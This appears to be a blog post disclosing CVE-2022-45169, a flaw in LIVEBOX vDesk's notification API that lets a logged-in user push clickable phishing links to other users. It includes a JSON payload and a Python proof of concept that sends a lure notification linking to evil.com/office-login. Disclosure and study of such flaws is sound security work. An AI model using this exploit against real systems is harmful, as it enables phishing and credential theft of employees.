CVE-2022-45169 - Stealing Clicks with Open Redirect & Push Notification Exploit in LIVEBOX vDesk
In late 2022, security researchers discovered a surprisingly simple but dangerous flaw in the popular enterprise software, LIVEBOX Collaboration vDesk (up to version v031). This post will dig into CVE-2022-45169: an Open Redirect combined with a Push Notification issue, explaining how it works, why it matters, and even providing code samples to demonstrate the exploit.
What is LIVEBOX vDesk?
LIVEBOX vDesk is an all-in-one collaboration platform used by companies to manage projects, chat, assign tasks, and send notifications. As with any business tool handling sensitive data and high user interaction, security is not optional.
What’s the Issue (In Simple Terms)?
CVE-2022-45169 is a vulnerability where a logged-in user can craft a malicious push notification to *any* other user. This message can secretly include a link to a site controlled by an attacker. The targeted user receives a normal-looking notification, and, if they click, they are silently redirected to a dangerous website — without suspecting foul play.
It's dangerous because it combines
1. Open Redirect: The URL redirection isn’t properly validated, so attackers can point it anywhere.
2. Invisible Link: The notification system lets attackers hide the malicious URL inside clickable text or even make it invisible.
The flaw exists at
POST /api/v1/notification/createnotification
The parameters look something like
{
"to_user": "victim_username",
"title": "Urgent: Action Needed",
"message": "Please review the attached report.",
"link": "https://evil.com/phishing";
}
The link parameter isn't validated. The system just wraps it in the notification, creating a clickable notification.
How the Exploit Works
Exploiter Prerequisites:
Steps
1. Craft a push notification. The attacker prepares a message with a hidden or friendly-sounding title (or even a blank space).
2. Insert a phishing/malicious URL in the link field (can also use shortened or obfuscated links).
3. Send the POST request to /api/v1/notification/createnotification using their own credentials.
4. Victim receives notification. When they click it, they are redirected (possibly invisibly or silently) to the destination — this might auto-download malware or ask for sensitive login info.
Proof-of-Concept (PoC) Code
Here’s a real-world simulation using Python and requests. You’ll need your own authentication token (auth_token), which you can get by logging in normally.
import requests
url = "https://vdesk.example.com/api/v1/notification/createnotification";
headers = {
"Authorization": "Bearer YOUR_AUTH_TOKEN",
"Content-Type": "application/json"
}
data = {
"to_user": "john.doe",
"title": "Quarterly Performance Review",
"message": "Please download the report.",
"link": "https://evil.com/office-login";
}
r = requests.post(url, headers=headers, json=data)
print(f'Status: {r.status_code}, Response: {r.text}')
What happens?
John Doe gets a notification titled “Quarterly Performance Review.”
- He clicks, and is secretly sent to https://evil.com/office-login — a site masquerading as the company’s login page.
Mitigations
- Patch: Upgrade to LIVEBOX vDesk version where this exploit is fixed (ask your vendor for details).
References & More Info
- Official CVE entry: NVD - CVE-2022-45169
- LIVEBOX vendor: https://www.livebox.online/
- OWASP on Open Redirect
- Exploit-DB Listing (if available)
Summary
CVE-2022-45169 is a classic example of “it’s not just code — it’s people.” By abusing an Open Redirect inside system notifications, attackers can leap past technical defenses and target users where they trust the most: their own company’s tools.
Key lesson: Always validate user input, especially anything that can generate URLs or links visible to others. And stay current with security patches!
*Stay safe, and don’t trust every notification you receive — even if it looks official.*
Timeline
Published on: 02/21/2024 16:15:49 UTC
Last modified on: 03/19/2024 16:48:23 UTC